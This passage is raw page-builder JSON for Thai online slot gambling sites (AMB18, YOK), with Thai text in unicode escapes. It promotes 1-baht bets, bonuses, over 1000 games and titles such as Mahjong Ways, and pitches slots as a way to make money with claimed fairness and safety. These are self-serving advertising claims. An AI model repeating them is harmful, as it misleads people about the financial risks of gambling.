\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec 